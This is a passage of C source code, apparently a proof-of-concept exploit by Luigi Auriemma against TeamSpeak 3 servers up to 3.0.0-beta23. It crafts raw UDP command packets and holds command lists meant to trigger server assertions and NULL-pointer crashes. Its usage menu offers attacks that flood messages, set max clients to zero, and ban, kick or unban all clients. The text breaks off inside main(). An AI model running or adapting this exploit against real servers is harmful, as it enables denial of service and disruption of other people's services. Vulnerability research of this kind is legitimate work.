/* |
by Luigi Auriemma |
*/ |
|
#include <stdio.h> |
#include <stdlib.h> |
#include <string.h> |
#include <stdint.h> |
#include <time.h> |
|
#ifdef WIN32 |
#include <winsock.h> |
#include "winerr.h" |
|
#define close closesocket |
#define sleep Sleep |
#define ONESEC 1000 |
#define waitms(x) sleep(x) |
#else |
#include <unistd.h> |
#include <sys/socket.h> |
#include <sys/types.h> |
#include <arpa/inet.h> |
#include <netinet/in.h> |
#include <netdb.h> |
|
#define ONESEC 1 |
#define stristr strcasestr |
#define stricmp strcasecmp |
#define waitms(x) sleep(x * 1000) |
#endif |
|
typedef uint8_t u8; |
typedef uint16_t u16; |
typedef uint32_t u32; |
|
|
|
#define VER "0.1" |
#define PORT 9987 |
#define BUFFSZ 0x400 // max 0x1f4 for "packetType != 1" |
|
#define SCAN_MS 40 |
#define INIT_TS3 if(sd) close(sd); \ |
sd = udp_sock(); \ |
p = buff; \ |
p += putrr(p, 8); /* tag */ \ |
p += putxx(p, 0, 16); /* header... */ \ |
p += putxx(p, 0, 16); \ |
p += putxx(p, 2, 8); /* packetType 2 is COMMAND */ |
|
|
|
static u8 *assert_cmds[] = { |
"banlist" , |
"complainlist" , |
"servernotifyunregister" , |
"serverrequestconnectioninfo" , |
"setconnectioninfo" , |
"servernotifyregister event=server" , |
NULL |
}; |
|
static u8 *null_cmds[] = { |
"bandelall" , |
"channelcreate channel_name=name" , |
"channelsubscribe cid=1" , |
"channelsubscribeall" , |
"banadd ip=1.2.3.4" , |
"clientedit clid=1 client_description=none" , |
"messageupdateflag msgid=1 flag=1" , |
"complainadd tcldbid=1 message=none" , |
"complaindelall tcldbid=1" , |
"ftinitupload clientftfid=1 name=file.txt cid=5 cpw= size=9999 overwrite=1 resume=0" , |
"ftgetfilelist cid=1 cpw= path=\\/" , |
"ftdeletefile cid=1 cpw= name=\\/" , |
"ftcreatedir cid=1 cpw= dirname=\\/" , |
"ftrenamefile cid=1 cpw= tcid=1 tcpw=secret oldname=\\/ newname=\\/" , |
"ftinitdownload clientftfid=1 name=\\/ cid=1 cpw= seekpos=0" , |
NULL |
}; |
|
static u8 *virtualserver[] = { |
"virtualserver_antiflood_ban_time" , |
"virtualserver_antiflood_points_needed_ban" , |
"virtualserver_antiflood_points_needed_kick" , |
"virtualserver_antiflood_points_needed_warning" , |
"virtualserver_antiflood_points_tick_reduce" , |
"virtualserver_autostart" , |
"virtualserver_channelsonline" , |
"virtualserver_client_connections" , |
"virtualserver_clientsonline" , |
"virtualserver_complain_autoban_count" , |
"virtualserver_complain_autoban_time" , |
"virtualserver_complain_remove_time" , |
"virtualserver_created" , |
"virtualserver_default_channel_admin_group" , |
"virtualserver_default_channel_group" , |
"virtualserver_default_server_group" , |
"virtualserver_download_quota" , |
"virtualserver_filebase" , |
"virtualserver_flag_password" , |
"virtualserver_hostbanner_gfx_interval" , |
"virtualserver_hostbanner_gfx_url" , |
"virtualserver_hostbanner_url" , |
"virtualserver_hostbutton_gfx_url" , |
"virtualserver_hostbutton_tooltip" , |
"virtualserver_hostbutton_url" , |
"virtualserver_hostmessage" , |
"virtualserver_hostmessage_mode" , |
"virtualserver_icon_id" , |
"virtualserver_id" , |
"virtualserver_keypair" , |
"virtualserver_log_channel" , |
"virtualserver_log_client" , |
"virtualserver_log_filetransfer" , |
"virtualserver_log_permissions" , |
"virtualserver_log_query" , |
"virtualserver_log_server" , |
"virtualserver_machine_id" , |
"virtualserver_max_download_total_bandwidth" , |
"virtualserver_max_upload_total_bandwidth" , |
"virtualserver_maxclients" , |
"virtualserver_min_client_version" , |
"virtualserver_min_clients_in_channel_before_forced_silence" , |
"virtualserver_month_bytes_downloaded" , |
"virtualserver_month_bytes_uploaded" , |
"virtualserver_name_phonetic" , |
"virtualserver_needed_identity_security_level" , |
"virtualserver_password" , |
"virtualserver_platform" , |
"virtualserver_port" , |
"virtualserver_priority_speaker_dimm_modificator" , |
"virtualserver_query_client_connections" , |
"virtualserver_queryclientsonline" , |
"virtualserver_reserved_slots" , |
"virtualserver_total_bytes_downloaded" , |
"virtualserver_total_bytes_uploaded" , |
"virtualserver_total_packetloss_control" , |
"virtualserver_total_packetloss_keepalive" , |
"virtualserver_total_packetloss_speech" , |
"virtualserver_total_packetloss_total" , |
"virtualserver_total_ping" , |
"virtualserver_upload_quota" , |
"virtualserver_uptime" , |
"virtualserver_version" , |
NULL |
}; |
|
|
|
int ts3_crypt(unsigned char *key /*includes nonce*/ , int hdrlen, unsigned char *data, int data_len, int encrypt); |
int udp_sock( void ); |
int putrr(u8 *dst, int len); |
int putmm(u8 *dst, u8 *src, int len); |
int putxx(u8 *data, u32 num, int bits); |
int send_recv( int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err); |
int timeout( int sock, int secs); |
u32 resolv( char *host); |
void std_err( void ); |
|
|
|
int main( int argc, char *argv[]) { |
struct sockaddr_in peer; |
int sd = 0, |
i, |
len, |
bug; |
u16 port = PORT; |
u8 buff[BUFFSZ], |
*host, |
*p; |
|
#ifdef WIN32 |
WSADATA wsadata; |
WSAStartup(MAKEWORD(1,0), &wsadata); |
#endif |
|
setbuf (stdout, NULL); |
|
fputs ( "\n" |
"TeamSpeak 3 <= 3.0.0-beta23 multiple vulnerabilities " VER "\n" |
"by Luigi Auriemma\n" |
"e-mail: aluigi@autistici.org\n" |
"web: aluigi.org\n" |
"\n" , stdout); |
|
if (argc < 3) { |
printf ( "\n" |
"Usage: %s <bug> <host> [port(%d)]>\n" |
"\n" |
"Bugs and some examples:\n" |
" 1 = interface for sending any custom command\n" |
" 2 = test the failed assertions\n" |
" 3 = test the NULL pointer dereferences\n" |
"\n" |
" 4 = flooding of random server messages\n" |
" 5 = set the number of max clients to 0 (USE bug 1 and virtualserver for more)\n" |
" 6 = ban all the clients currently in the server\n" |
" 7 = unban all the banned clients\n" |
" 8 = kick all the clients currently in the server\n" |
" 9 = send a poke message to all the clients in the server\n" |
"\n" , argv[0], port); |
exit (1); |
} |
|
bug = atoi (argv[1]); |
host = argv[2]; |
if (argc > 3) port = atoi (argv[3]); |
|
<
0 条评论。